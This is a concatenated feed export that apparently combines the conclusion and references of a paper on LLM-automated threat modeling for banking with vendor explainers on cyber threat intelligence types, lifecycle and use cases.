Effort: The approach automates threat modeling, minimizing human intervention, reducing errors, and accelerating response times, making it scalable and resource-efficient for complex systems.The role of Large Language Models in cybersecurity, particularly in automating tasks like threat modeling, has demonstrated significant potential but remains underexplored. Our research illustrates that with proper prompt engineering and fine-tuning, LLMs can effectively automate threat modeling for banking systems, resulting in substantial improvements in both threat identification accuracy and the quality of mitigation strategies. By integrating techniques such as Chain of Thought and Optimization by PROmpting alongside fine-tuning, our proposed system ThreatModeling-LLM achieves superior performance in detecting and addressing security vulnerabilities. The results also emphasize that smaller, fine-tuned models like Llama-3.1-8B, when combined with prompt engineering, can dramatically enhance performance, even outperforming models like GPT-3.5-turbo in key metrics. This makes them a resource-efficient solution that does not compromise accuracy, making Llama-3.1-8B particularly promising for real-world applications where computational resources are limited.The work has been supported by the Cyber Security Research Centre Limited whose activities are partially funded by the Australian Government’s Cooperative Research Centres Programme. [1]↑W. Xiong, E. Legrand, O. Åberg, and R. Lagerström, “Cyber security threat modeling based on the mitre enterprise att&ck matrix,” Software and Systems Modeling, vol. 21, no. 1, pp. 157–177, 2022. [2]↑A. Ibrahim, D. Thiruvady, J.-G. Schneider, and M. Abdelrazek, “The challenges of leveraging threat intelligence to stop data breaches,” Frontiers in Computer Science, vol. 2, p. 36, 2020. [3]↑R. Stevens, D. Votipka, E. M. Redmiles, C. Ahern, P. Sweeney, and M. L. Mazurek, “The battle for new york: A case study of applied digital threat modeling at the enterprise level,” in 27th USENIX Security Symposium (USENIX Security 18), 2018, pp. 621–637. [4]↑E. Crothers, N. Japkowicz, and H. L. Viktor, “Machine-generated text: A comprehensive survey of threat models and detection methods,” IEEE Access, 2023. [5]↑T. B. Brown, “Language models are few-shot learners,” arXiv preprint arXiv:2005.14165, 2020. [6]↑A. Dubey, A. Jauhri, A. Pandey, A. Kadian, A. Al-Dahle, A. Letman, A. Mathur, A. Schelten, A. Yang, A. Fan et al., “The llama 3 herd of models,” arXiv preprint arXiv:2407.21783, 2024.
[7]↑O. Foundation, “pytm: A pythonic framework for threat modeling,” OWASP Project, 2024. [Online]. Available: https://owasp.org/www-project-pytm/
[8]↑M. Adams and K. Shibata, “Stride gpt: An ai-powered threat modeling tool,” GitHub repository, 2024. [Online]. Available: https://github.com/mrwadams/stride-gpt [9]↑M. Kaheh, D. K. Kholgh, and P. Kostakos, “Cyber sentinel: Exploring conversational agents in streamlining security tasks with gpt-4,” arXiv preprint arXiv:2309.16422, 2023. [10]↑J. Wei, X. Wang, D. Schuurmans, M. Bosma, F. Xia, E. Chi, Q. V. Le, D. Zhou et al., “Chain-of-thought prompting elicits reasoning in large language models,” Advances in neural information processing systems, vol. 35, pp. 24 824–24 837, 2022.
[11]↑C. Yang, X. Wang, Y. Lu, H. Liu, Q. V. Le, D. Zhou, and X. Chen, “Large language models as optimizers,” in The Twelfth International Conference on Learning Representations, 2024. [Online]. Available: https://openreview.net/forum?id=Bb4VGOWELI [12]↑T. Xin and B. Xiaofang, “Online banking security analysis based on stride threat model,” International Journal of Security and Its Applications, vol. 8, no. 2, pp. 271–282, 2014. [13]↑A. Chattopadhyay and D. Sripada, “Security analysis and threat modelling of mobile banking applications,” in 2023 14th International Conference on Computing Communication and Networking Technologies (ICCCNT).   IEEE, 2023, pp. 1–6. [14]↑C. Möckel and A. E. Abdallah, “Threat modeling approaches and tools for securing architectural designs of an e-banking application,” in 2010 Sixth International Conference on Information Assurance and Security.   IEEE, 2010, pp. 149–154. [15]↑C. MÖckel and A. E. Abdallah, “Understanding the value and potential of threat modeling for application security design: An e-banking case study,” Journal of Information Assurance and Security, vol. 6, no. 4, 2011. [16]↑N. A. A. Bakar, M. A. Hassan, and N. H. Hassan, “Iot in banking: The trends, threats, and solution,” Open International Journal of Informatics, vol. 9, no. 1, pp. 65–77, 2021. [17]↑M. Aijaz, M. Nazir, and M. N. A. Mohammad, “Threat modeling and assessment methods in the healthcare-it system: A critical review and systematic evaluation,” SN Computer Science, vol. 4, no. 6, p. 714, 2023. [18]↑E. Beozzo and A. Hakkala, “A modern approach for threat modelling in agile environments: redesigning the process in a saas company,” 2023. [19]↑Z. Abuabed, A. Alsadeh, and A. Taweel, “Stride threat model-based framework for assessing the vulnerabilities of modern vehicles,” Computers & Security, vol. 133, p. 103391, 2023. [20]↑A. Ananthapadmanabhan and K. Achuthan, “Threat modeling and threat intelligence system for cloud using splunk,” in 2022 10th International Symposium on Digital Forensics and Security (ISDFS).   IEEE, 2022, pp. 1–6. [21]↑F. De Rosa, N. Maunero, P. Prinetto, F. Talentino, and M. Trussoni, “Threma: Ontology-based automated threat modeling for ict infrastructures,” IEEE Access, vol. 10, pp. 116 514–116 526, 2022. [22]↑A. S. T. Reski, ““open weakness and vulnerability modeler”(ovvl): An updated approach to threat modeling,” 2019. [23]↑E. J. Hu, Y. Shen, P. Wallis, Z. Allen-Zhu, Y. Li, S. Wang, L. Wang, and W. Chen, “Lora: Low-rank adaptation of large language models,” arXiv preprint arXiv:2106.09685, 2021. [24]↑N. Shevchenko, T. A. Chick, P. O’Riordan, T. P. Scanlon, and C. Woody, “Threat modeling: a summary of available methods,” Software Engineering Institute— Carnegie Mellon University, 2018.
[25]↑OpenAI, “Chatgpt: Language model for conversational responses,” Software, 2022. [Online]. Available: https://www.openai.com/chatgpt
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/threat-modeling-llm-banking.htmlProjects/cti/threat-modeling-llm-banking.mdTue, 28 Apr 2026 14:35:56 GMT<figure><img src="https://arxiv.org/html/2411.17058v1/x1.png"></figure>Table of contents:
Defining Threat Intelligence
Threat Intelligence Types
Who Can Gain From Threat Intelligence?
Threat Intelligence Lifecycle
Threat Intelligence Use Cases
At least for two decades, we have been witnessing relentless changes in the threat landscape towards growth and sophistication, with both rough actors and state-sponsored collectives devising sophisticated offensive campaings against organizations globally. In 2024, adversaries, on average, proceed with 11,5 attacks per minute. Simultaneously, it takes 277 days for SecOps teams to detect and contain a data breach, according to research by IDM and Ponemon Institute. One of the reasons for such a layoff is the massive talent shortage within the industry, with 71% of organizations having unfilled positions.In view of the existing talent gap and ever-growing attack surface, it is essential to make informed decisions about proper prioritization and resource-effective cyber defense operations. Gartner states that threat intelligence, also known as cyber threat intelligence (CTI), is a crucial element of security architecture. It aids security professionals in detecting, triaging, and investigating threats, thus enhancing an organization’s security posture. By improving alert quality, reducing investigation times, and providing coverage for the latest cyber attacks and actors, CTI plays a vital role in modern cyber defense.
According to Gartner, threat intelligence is defined as “evidence-based knowledge (e.g., context, mechanisms, indicators, implications, and action-oriented advice) about existing or emerging menaces or hazards to assets.” In other words, threat intel is comprehensive and actionable data aimed at anticipating and thwarting organization-specific cyber threats. CTI empowers security teams to take a data-driven approach to proactively and effectively withstand cyber attacks before they escalate while facilitating detection and hunting efforts. 
A study by Statista forecasts that the CTI market will exceed 44 billion U.S. dollars by 2033, highlighting the increasing importance of informed, data-driven defenses in contemporary business strategies. This prediction aligns with the outcomes from the Recorded Future 2023 State of Threat Intelligence report, revealing that 70.9% of respondents have a dedicated team for gathering and analyzing threat intelligence.Integrating threat intelligence into your cybersecurity strategy can be challenging. It requires prioritizing your organization’s specific information needs and evaluating your security controls to effectively operationalize threat intelligence. Misusing CTI can result in an overload of alerts and an increase in false positives, highlighting the importance of proper implementation.Threat intelligence can be grouped into tactical, strategic, and operational depending on the organization’s objectives, parties engaged, specific requirements, and overall goals in a lifecycle scenario. Strategic threat intel provides high-level insights into the global attack surface and how an organization fits into it. It is mainly used for long-term decisions that transform the processes and foster the advancement of cybersecurity programs. Stakeholders leverage strategic threat intelligence to align organizational cybersecurity strategies and investments with the cybersecurity landscape. Tactical threat intel involves indicators of compromise (IOCs), such as IP addresses, domains, URLs, or hashes consumed by security controls but also used manually during investigations. It helps Security Operations Centers (SOCs) detect and respond to ongoing cyber attacks, focusing on common IOCs, like IP addresses linked to adversary C2 servers, file hashes from identified incidents, or email subject lines associated with phishing attacks. This type of threat intel assists in filtering out false positives and uncovering hidden attackers, aiding security teams in their daily SOC operations. In a nutshell, tactical CTI is intended to serve short-term decisions, like issuing urgent alerts, escalating cybersecurity processes, or adjusting configurations within the existing infrastructure. Operational threat intel, also known as technical CTI, enables organizations to proactively thwart cyber attacks by focusing on known adversary TTPs.  Information security leaders like CISOs and SOC Managers take advantage of this type of CTI to anticipate potential threat actors and implement targeted security measures to combat attacks that are most challenging the business. Threat intelligence encompasses extensive and actionable data designed to anticipate and counteract threats specific to an organization no matter its size, industry, or level of cybersecurity maturity. CTI equips security teams with the data necessary to proactively and effectively defend against cyber attacks, facilitating both detection and response efforts and enabling businesses to gain a holistic understanding of existing threats or proactive measures not yet linked to cyber attacks.For small and medium-sized businesses, threat intelligence provides a level of protection that might otherwise be unattainable. Large-scale enterprises with extensive security teams can reduce costs and skill requirements by using external threat intelligence, making their analysts more effective.Depending on the type of threat intelligence, any member of a security team can make the most of CTI to elevate the organization’s defenses: Security and IT analysts can enhance detection capabilities and fortify defenses. They correlate CTI by collecting raw threat data and security-related details from a wide range of sources, including open-source CTI feeds, information exchange peer-driven communities, or internal organization-specific log sources.  SOC analysts correlate and analyze tactical threat intel to identify trends, patterns, and adversary behaviors and rank incidents by their risk and potential impact, which in turn improves the accuracy of threat identification and reduces false positives. Threat hunters rely on operational CTI in their hypothesis-driven investigations, providing insights into attacker TTPs to prioritize the most critical threats. They also leverage tactical threat intel to facilitate IOC-based hunting and document indicators of compromise linked to emerging and existing threats. CTI also facilitates proactive threat hunting, enabling detecting potential threats at the earliest attack stages before they cause significant harm.  CSIRT (Computer Security Incident Response Team) can leverage threat intelligence to accelerate incident response capabilities. Threat intelligence provides CSIRT with crucial insights into the latest threats, including IOCs and attack patterns used by malicious actors, to promptly identify and remediate incidents within the organization. By integrating CTI into their workflows, CSIRT can enhance the efficiency of incident prioritization and response, resulting in quicker actions and lessened impact from cyber attacks. Executive management, such as CISOs, SOC Managers, and other information security decision-makers, leverage strategic threat intel to gain comprehensive visibility into the threats most challenging the business. This fosters strategic planning to anticipate future threats and vulnerabilities and effectively mitigate their impact. CTI-related operation is a continuous process of transforming the raw data into actionable insights for informed decision making. The CTI lifecycle acts as a simple framework to enable SecOps departments to optimize their efforts and resources toward threat-informed cyber defense. Although the approaches might slightly vary, normally, the threat intelligence lifecycle consists of 6 major milestones resulting in an effective workflow and continuous feedback loop for improvement at scale. Direction. At this stage, security teams establish the requirements and goals for a particular CTI operation. During this planning stage, teams create a roadmap, with goals, methodology, and tools defined depending on the needs of the parties involved.  Collection. Once the goals and objectives are clear, teams can start the data collection process. This involves gathering data from various sources, including security logs, threat feeds, forums, social media, subject matter experts, etc. In fact, the idea is to collect as much relevant information as possible. Processing. Once all the required information is available, the next stage of the lifecycle presumes its processing and organization into usable form. Normally, it includes evaluating data for relevance, filtering, removing irrelevant details, translating info from foreign sources, and structuring the core data for further analysis. Analysis. Having a ready dataset at hand, teams proceed with the thorough analysis to convert disparate data pieces into actionable CTI, including threat actors profiling, threat correlation, and behavious analysis. Dissemination. Once analysis is performed, at the dissemination phase teams ensure that key conclusions and recommendations are received by stakeholders. Feedback. The final stage is receiving feedback from the parties and stakeholders involved to determine adjustments and improvements to be made during the next cycle.

SOC Prime Platform for collective cyber defense provides out-of-the-box CTI capability, enabling teams to significantly reduce the time and effort required for each threat intelligence lifecycle stage. By relying on SOC Prime, security experts can swiftly navigate through large volumes of data and explore researched and packaged context on any cyber attack or threat, including zero-days, MITRE ATT&CK® references, and Red Team tooling to proactively identify and thwart threats that matter most. All the threat intel and actionable metadata are linked to 13K+ Sigma rules, which include triage and audit configuration recommendations, to make your threat research perfectly matching your current needs.Threat intelligence is an essential element of a comprehensive cybersecurity program that has hands-on applications across multiple security areas to enhance detection, response, and future-proof the overall cybersecurity posture. From accelerating incident triage and prioritizing alerts to supporting daily security operations and conducting proactive threat hunting, it offers critical insights into common threat intelligence use cases. Alert Triage and Prioritization. Threat intelligence assists SOC analysts in accelerating alert triage by helping them gain contextual information to fully comprehend and prioritize alerts and easily assess whether escalation or remediation of the incident is necessary. By enriching alerts with actionable CTI, defenders can easily cut through the noise and reduce false positive rates.  Proactive Threat Detection and Hunting. Threat intelligence is crucial in TTP-based threat hunting, enabling security teams to proactively search for signs of advanced threats within their environment. By operationalizing threat intel, security teams can uncover hidden threats and vulnerabilities that evade traditional security controls, quickly identify suspicious behavior during hunts, and disrupt threats before they strike. Threat intelligence also facilitates the tracking of critical performance metrics, like Mean Time To Detect (MTTD), helping evaluate the efficiency of threat detection and response efforts. Vulnerability Management. Threat intelligence provides insights into emerging vulnerabilities and zero-day exploits. This allows organizations to prioritize patching and mitigation efforts based on the real-world threats relevant to their infrastructure.
Phishing & Fraud Detection. In the year of AI, phishing attacks increased by 58.2%, as compared to the previous year, indicating the increased sophistication and expansion of adversaries, which underscores the need for strengthening defensive measures against phishing campaigns. Threat intelligence helps in identifying phishing campaigns, malicious domains, and suspicious IP addresses associated with fraudulent activities. This enables organizations to block malicious communications and proactively defend against phishing attacks of any scale. Strategic Decision Making. Threat intelligence assists in mapping the threat landscape, evaluating risks, and offering essential context for making timely decisions to refine cybersecurity strategies in line with the current business priorities. By understanding the evolving threat landscape, organizations can allocate resources effectively to strengthen their overall cybersecurity posture.
Community Collaboration & Knowledge Sharing. Threat intelligence fosters information exchange and global industry collaboration by providing valuable insights into emerging threats, attack trends, and adversary tactics. Security teams can share CTI with industry peers, government agencies, and peer-driven communities to collectively strengthen defenses and mitigate risks while enhancing situational awareness across the cybersecurity landscape. Moreover, threat intelligence fosters a community-driven approach where organizations can share their expertise with aspiring security engineers and adapt strategies together to effectively combat cyber threats. SOC Prime’s Discord serves as a community-driven platform where cybersecurity professionals of diverse experience levels and backgrounds connect to exchange their knowledge and insights with newcomers, share behavior-based detection algorithms and threat intelligence, and discuss the latest cybersecurity trends to gain a competitive advantage against adversaries. 
 SOC Prime’s product suite for advanced threat detection, AI-powered detection engineering, and automated threat hunting serves out-of-the-box CTI capability, helping security teams save time & effort on threat intel operations. By relying on SOC Prime Platform, organizations can seamlessly keep up with the latest TTPs used by adversaries in the wild, as well as proactive methods not yet linked to cyber attacks. Explore relevant context linked to 13K+ Sigma rules addressing any cyber attack or threat, including zero-days, CTI and MITRE ATT&CK references, or Red Team tooling to facilitate operationalizing your threat intelligence.
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/what-is-threat-intelligence.htmlProjects/cti/what-is-threat-intelligence.mdTue, 28 Apr 2026 14:35:56 GMT<figure><img src="https://socprime.com/wp-content/uploads/Threat-Intelligence-Basics-1.jpg"></figure>Why Is Threat Intelligence Important?
Who Can Benefit From Threat Intelligence?
Threat Intelligence Use Cases
Incident Response
Security Operations
Vulnerability Management
Risk Analysis
Fraud Prevention
Security Leadership
Reducing Third-Party Risk
The Cyber Threat Intelligence Cycle
1. Planning and Direction
2. Collection
3. Processing
4. Analysis
5. Dissemination
6. Feedback
Cyber Threat Intelligence Cycle FAQs
Why is the cyber threat intelligence cycle crucial for security teams?
What are the main benefits of implementing a threat intelligence program?
Which organizations benefit the most from the cyber threat intelligence cycle?
What are the common challenges faced when implementing the cyber threat intelligence cycle?
The Types of Threat Intelligence
Tactical Threat Intelligence
Operational Threat Intelligence
Strategic Threat Intelligence
Machine Learning for Better Threat Intelligence
1. To structure data into entities and events
2. To structure text in multiple languages through natural language processing
3. To classify events and entities, helping human analysts prioritize alerts
4. To forecast events and entity properties through predictive models
Cyber Threat Intel FAQs
What are some examples of threat intel usage?
How can organizations implement cyber threat intelligence?
How to measure the effectiveness of cyber threat intelligence?
What are the common challenges and solutions in cyber threat intelligence deployment?
What are the latest trends and developments in cyber threat intelligence?
Why is the cyber threat intelligence cycle crucial for security teams?
What are the main benefits of implementing a threat intelligence program?
Which organizations benefit the most from the cyber threat intelligence cycle?
What are the common challenges faced when implementing the cyber threat intelligence cycle?
Key Takeaways
Threat Actors: An Overview
The Cyber Attack Kill Chain
7 Phases of The Cyber Kill Chain Model
1. Target Selection
2. Target Research
3. Attack Plans
4. Gaining a Foothold
5. Reach Objectives
6. Command and Control (C2)
7. Actions on Objectives
Real-life Use cases for the Cyber Kill Chain Model
Open Source Threat Intelligence Feeds (OSINT)
Commercial (Paid) Threat Intelligence Feeds
Industry-Specific Threat Intelligence Feeds
Government and Non-Governmental Organization (NGO) Threat Intelligence Feeds
5 Benefits of Cyber Threat Intelligence Feeds
Making Cyber Threat Intelligence Feeds Actionable
Threat Data: Evaluating Threat Feed Analytics
Contextual Threat Intelligence for Security Teams
Threat Intelligence Feed FAQ
What is an example of a Threat Intelligence Feed?
How do you create a Threat Feed?
What is an Intelligence Feed? Is it different from a Threat Intelligence Feed?
What’s the difference between Threat Feeds vs. Threat Intel Feeds?
Open Source Intelligence Feeds vs. Paid Intelligence Feeds: What’s the Difference?
What is a Resource Threat Feed?
What is the Best Threat Intelligence Feed?
Adversary
Infrastructure
Capability
Target
Exploring Real-World Applications of the Diamond Model of Intrusion Analysis
Why does it matter for security teams? In today's interconnected world, digital technologies power almost every industry. While their automation and connectivity have transformed economies and cultures, they also expose us to cyber threats. Thankfully, we have tools like threat intelligence at our disposal. Often likened to open-source intelligence (OSINT), threat intelligence equips us with the knowledge to prevent or minimize cyberattacks.This data-driven knowledge provides crucial context: who the attackers are, their motivations and capabilities, and tell-tale signs in your systems to watch out for. Armed with this information, you can make informed decisions to bolster your security posture.As Gartner defines it, "threat intelligence is evidence-based knowledge that provides context, mechanisms, indicators, implications, and actionable advice about existing or emerging threats to your assets. This intelligence empowers you to respond effectively to these threats and hazards."Cybersecurity Threats Are Evolving, But Threat Intelligence Can Help. Traditional security methods struggle with complex threats, information overload, and limited expertise. Businesses face attacks from various angles, demanding a broader understanding of risk.Threat intelligence offers a solution: Machine learning automates data analysis, reducing analyst workload. Integrates with existing systems for seamless information flow. Processes unstructured data from diverse sources. Connects the dots by providing context on: Indicators of Compromise (IoCs): Signs of malicious activity. Tactics, Techniques, and Procedures (TTPs): How attackers operate. Actionable insights: Timely: Early warnings for proactive defense. Contextual: Understands the bigger picture. Usable: Clear information for decision-makers. By leveraging threat intelligence, organizations can gain a proactive edge in today's dynamic cybersecurity landscape.
Forget the mystique: threat intelligence isn't just for cybersecurity ninjas. It's a powerful tool that can benefit every function within your security team, regardless of size or budget.The problem: Isolating threat intelligence as a separate department leaves valuable insights locked away from those who need them most.The solution: Integrate threat intelligence seamlessly with your existing security systems. This allows everyone to benefit from: Reduced alert fatigue: Prioritize and filter threats automatically, freeing up security operations teams. Sharpened vulnerability focus: Understand which vulnerabilities deserve immediate attention through external context and insights. Holistic risk analysis: Gain a comprehensive understanding of the threat landscape, including attacker tactics and techniques, to inform fraud prevention, risk management, and other security processes. Explore our these cases to see how specific roles can leverage threat intelligence for maximum impact. Don't let valuable information stay siloed – make it accessible to everyone who can put it to good use, strengthening your overall security posture.A 2022 Statista report revealed that published threat intelligence and real-time alerts were widely used by organizations, highlighting its versatility and critical role for various teams. Threat intelligence goes beyond merely stopping attacks, offering valuable insights for: prioritizing incidents (triage), assessing risks, managing vulnerabilities, and making informed decisions across the organization.
Security analysts in charge of incident response report some of the highest levels of stress in the industry, and it’s no wonder why — the rate of cyber incidents has steadily climbed over the last two decades, and a high proportion of daily alerts turn out to false positives. When dealing with real incidents, analysts must often spend time painstakingly sorting through data manually to assess the problem.Threat intelligence reduces the pressure in multiple ways: Automatically identifying and dismissing false positives Enriching alerts with real-time context, like custom risk scores Comparing information from internal and external sources Most SOC teams must deal with huge volumes of alerts generated by the networks they monitor. Triaging these alerts takes too long, and many are never investigated at all. “Alert fatigue” leads analysts to take alerts less seriously than they should. Threat intelligence solves many of these problems — helping gather information about threats more quickly and accurately, filter out false alarms, speed up triage, and simplify incident analysis. With it, analysts can stop wasting time pursuing alerts based on: Actions that are more likely to be innocuous rather than malicious Attacks that are not relevant to that enterprise Attacks for which defenses and controls are already in place Effective vulnerability management means shifting from taking a “patch everything, all the time” approach — one that nobody can realistically ever achieve — to prioritizing vulnerabilities based on actual risk.Although the number of vulnerabilities and threats has increased every year, research shows that most threats target the same, small proportion of vulnerabilities. Threat actors are also quicker — it now only takes fifteen days on average between a new vulnerability being announced and an exploit targeting it appearing.This has two implications: You have two weeks to patch or remediate your systems against a new exploit. If you can’t patch in that timeframe, have a plan to mitigate the damage. If a new vulnerability is not exploited within two weeks to three months, it’s unlikely to ever be — patching it can take lower priority. Threat intelligence helps you identify the vulnerabilities that pose an actual risk to your organization, going beyond CVE scoring by combining internal vulnerability scanning data, external data, and additional context about the TTPs of threat actors. Risk modeling can be a useful way for organizations to set investment priorities. But many risk models suffer from vague, non-quantified output that is hastily compiled, based on partial information, based on unfounded assumptions, or is difficult to take action on.Threat intelligence provides context that helps risk models make defined risk measurements and be more transparent about their assumptions, variables, and outcomes. It can help answer questions such as: Which threat actors are using this attack, and do they target our industry? How often has this specific attack been observed recently by enterprises like ours? Is the trend up or down? Which vulnerabilities does this attack exploit, and are those vulnerabilities present in our enterprise? What kind of damage, technical and financial, has this attack caused in enterprises like ours? To keep your organization safe, it isn’t enough to only detect and respond to threats already exploiting your systems. You also need to prevent fraudulent uses of your data or brand.Threat intelligence gathered from underground criminal communities provides a window into the motivations, methods, and tactics of threat actors, especially when this intelligence is correlated with information from the surface web, including technical feeds and indicators.Use threat intelligence to prevent: Payment fraud  Compromised data Typosquatting
CISOs and other security leaders must manage risk by balancing limited available resources against the need to secure their organizations from ever-evolving threats. Threat intelligence can help map the threat landscape, calculate risk, and give security personnel the intelligence and context to make better, faster decisions.Today, security leaders must:
Assess business and technical risks, including emerging threats and “known unknowns” that might impact the business Identify the right strategies and technologies to mitigate the risks Communicate the nature of the risks to top management, and justify investments in defensive measures Threat intelligence can be a critical resource for all these activities, providing information on general trends, such as: Which types of attacks are becoming more (or less) frequent Which types of attacks are most costly to the victims What new kinds of threat actors are coming forward, and the assets and enterprises they are targeting The security practices and technologies that have proven the most (or least) successful in stopping or mitigating these attacks It can also enable security groups to assess whether an emerging threat is likely to affect their specific enterprise based on factors such as: Industry — Is the threat affecting other businesses in our vertical? Technology — Does the threat involve compromising software, hardware, or other technologies used in our enterprise?
Geography — Does the threat target facilities in regions where we have operations? Attack method — Have methods used in the attack, including social engineering and technical methods, been used successfully against our company or similar ones?
With these types of intelligence, gathered from a broad set of external data sources, security decision makers gain a holistic view of the cyber risk landscape and the greatest risks to their enterprise.Here are four key areas where threat intelligence helps security leaders make decisions: Mitigation — Threat intelligence helps security leaders prioritize the vulnerabilities and weaknesses that threat actors are most likely to target, giving context on the TTPs those threat actors use, and therefore the weaknesses they tend to exploit.
Communication — CISOs are often challenged by the need to describe threats and justify countermeasures in terms that will motivate non-technical business leaders, such as cost, impact on customers, new technologies. Threat intelligence provides powerful ammunition for these discussions, such as the impact of similar attacks on companies of the same size in other industries or trends and intelligence from the dark web indicating that the enterprise is likely to be targeted. Supporting leaders — Threat intelligence can provide security leaders with a real-time picture of the latest threats, trends, and events, helping security leaders respond to a threat or communicate the potential impact of a new threat type to business leaders and board members in a timely and efficient manner. The security skills gap — CISOs must make sure the IT organization has the human resources to carry out its mission. But cybersecurity’s skills shortage means existing security staff frequently cope with unmanageable workloads. Threat intelligence automates some of the most labor-intensive tasks, rapidly collecting data and correlating context from multiple intelligence sources, prioritizing risks, and reducing unnecessary alerts. Powerful threat intelligence also helps junior personnel quickly “upskill” and perform above their experience level. Countless organizations are transforming the way they do business through digital processes. They’re moving data from internal networks to the cloud, and gathering more information than ever before.
Making data easier to collect, store, and analyze is certainly changing many industries for the better, but this free flow of information comes with a price. It means that to assess the risk of our own organization, we also have to consider the security of our partners, vendors, and other third parties.Unfortunately, many of the most common third-party risk management practices employed today are lagging behind security requirements. Static assessments of risk, like financial audits and security certificate verifications, are still important, but they often lack context and aren’t always timely. There’s a need for a solution that offers real-time context on the actual threat landscape.Threat intelligence is one way to do just that. It can provide transparency into the threat environments of the third parties you work with, providing real-time alerts on threats and changes to their risks and giving you the context you need to evaluate your relationships.So, how does threat intelligence get produced? Raw data is not the same thing as intelligence — threat intelligence is the finished product that comes out of a six-part cycle of data collection, processing, and analysis. This process is a cycle because new questions and gaps in knowledge are identified during the course of developing intelligence, leading to new collection requirements being set. An effective intelligence program is iterative, becoming more refined over time.
To maximize the value of the threat intelligence you produce, it’s critical that you identify your use cases and define your objectives before doing anything else.The first step to producing actionable threat intelligence is to ask the right question.The questions that best drive the creation of actionable threat intelligence focus on a single fact, event, or activity — broad, open-ended questions should usually be avoided.Prioritize your intelligence objectives based on factors like how closely they adhere to your organization’s core values, how big of an impact the resulting decision will have, and how time sensitive the decision is.One important guiding factor at this stage is understanding who will consume and benefit from the finished product — will the intelligence go to a team of analysts with technical expertise who need a quick report on a new exploit, or to an executive that’s looking for a broad overview of trends to inform their security investment decisions for the next quarter?The next step is to gather raw data that fulfills the requirements set in the first stage. It’s best to collect data from a wide range of sources — internal ones like network event logs and records of past incident responses, and external ones from the open web, the dark web, and technical sources.Threat data is usually thought of as lists of IoCs, such as malicious IP addresses, domains, and file hashes, but it can also include vulnerability information, such as the personally identifiable information of customers, raw code from paste sites, and text from news sources or social media.Once all the raw data has been collected, you need to sort it, organizing it with metadata tags and filtering out redundant information or false positives and negatives.
Today, even small organizations collect data on the order of millions of log events and hundreds of thousands of indicators every day. It’s too much for human analysts to process efficiently — data collection and processing has to be automated to begin making any sense of it.Solutions like SIEMs are a good place to start because they make it relatively easy to structure data with correlation rules that can be set up for a few different use cases, but they can only take in a limited number of data types.If you’re collecting unstructured data from many different internal and external sources, you’ll need a more robust solution. Recorded Future uses machine learning and natural language processing to parse text from millions of unstructured documents across seven different languages and classify them using language-independent ontologies and events, enabling analysts to perform powerful and intuitive searches that go beyond bare keywords and simple correlation rules.The next step is to make sense of the processed data. The goal of analysis is to search for potential security issues and notify the relevant teams in a format that fulfills the intelligence requirements outlined in the planning and direction stage.Threat intelligence can take many forms depending on the initial objectives and the intended audience, but the idea is to get the data into a format that the audience will understand. This can range from simple threat lists to peer-reviewed reports.The finished product is then distributed to its intended consumers. For threat intelligence to be actionable, it has to get to the right people at the right time.
It also needs to be tracked so that there is continuity between one intelligence cycle and the next and the learning is not lost. Use ticketing systems that integrate with your other security systems to track each step of the intelligence cycle — each time a new intelligence request comes up, tickets can be submitted, written up, reviewed, and fulfilled by multiple people across different teams, all in one place.The final step is when the intelligence cycle comes full circle, making it closely related to the initial planning and direction phase. After receiving the finished intelligence product, whoever made the initial request reviews it and determines whether their questions were answered. This drives the objectives and procedures of the next intelligence cycle, again making documentation and continuity essential.
If you wish to delve deeper into how this cycle functions, we invite you to check out our post on the Cyber Threat Intelligence LifeCycle, where we explore the phases in detail and provide insights on optimizing each stage for enhanced security posture.
On your journey to security intelligence, comprehensive, real-time intelligence must be woven tightly into your security processes, third-party risk management program, and brand protection strategy. But in order to get there, how can you develop threat intelligence that truly adds value to your organization? And how can you ensure the intelligence you deliver is actionable for teams across security functions?To answer these questions, it’s important to view threat intelligence production as a multi-step, cyclical process — not a point-in-time task.
First, the goals of the cyber threat intelligence cycle must be defined by key stakeholders. These objectives may vary widely from organization to organization depending on use cases, priorities, and risk. From there, data must be gathered from a range of sources — internal, technical, and human — to develop a complete picture of potential and actual cyber threats. Then, this data must be processed and turned into actual intelligence that is timely, clear, and actionable for everyone — whether they’re staffing a SOC, responding to security incidents, managing vulnerabilities, analyzing third-party risk, protecting your digital brand, or making high-level security decisions. This finished intelligence output then goes back to key stakeholders, who can use it to continuously improve future intelligence cycles and hone their decision-making process.
The following excerpt from “The Threat Intelligence Handbook: Moving Toward a Security Intelligence Program” has been edited and condensed for clarity. In it, we'll examine each of the six phases of the threat intelligence lifecycle, review sources of threat intelligence, and look at the roles of threat intelligence tools and human analysts.The cyber threat intelligence cycle is pivotal for security teams as it provides a structured methodology to gather, analyze, and utilize threat intelligence. This cycle aids in understanding the threat landscape better, which in turn helps in preparing for and reacting to security threats efficiently. Through this cycle, actionable intelligence is generated which is instrumental in making informed decisions to bolster the organization's security posture against cyber attacks.Implementing a threat intelligence program empowers organizations with the capability to anticipate, prepare for, and mitigate potential security threats. This program is an integral part of the threat intelligence process, facilitating a deeper understanding of threat actors and their tactics. It thereby enables the threat intelligence team to deliver finished threat intelligence crucial for proactive defense measures. Moreover, a threat intelligence program enriches incident response strategies and fosters a culture of continuous learning and adaptation to the evolving threat landscape.Organizations operating in sectors with high-value data such as finance, healthcare, and government are often prime targets for threat actors, hence they greatly benefit from the cyber threat intelligence cycle. This cycle, with its defined threat intelligence lifecycle stages, aids in intelligence collection and threat intelligence analysis, crucial for understanding and mitigating potential risks. Additionally, organizations with a significant online presence, businesses that focus heavily on uptime, or those subject to regulatory compliance also find the cyber threat intelligence cycle indispensable in navigating the complex security landscape.The common challenges during implementation include the initial setup of a robust threat intelligence platform, ensuring continuous and relevant intelligence collection, and analyzing data accurately to generate actionable insights. The effectiveness of threat intelligence reports can be hindered by a lack of skilled personnel or inadequate resources. Furthermore, integrating the insights obtained from the threat intelligence analysis into the existing incident response procedures and ensuring a seamless flow of information can also pose significant challenges.As demonstrated by the intelligence lifecycle, the final product will look different depending on the initial intelligence requirements, sources of information, and intended audience. It can be helpful to break down threat intelligence into a few categories based on these criteria.Threat intelligence is often broken down into three subcategories: Strategic — Broader trends typically meant for a non-technical audience Tactical — Outlines of the tactics, techniques, and procedures of threat actors for a more technical audience
Operational — Technical details about specific attacks and campaigns (sometimes also called technical threat intelligence)

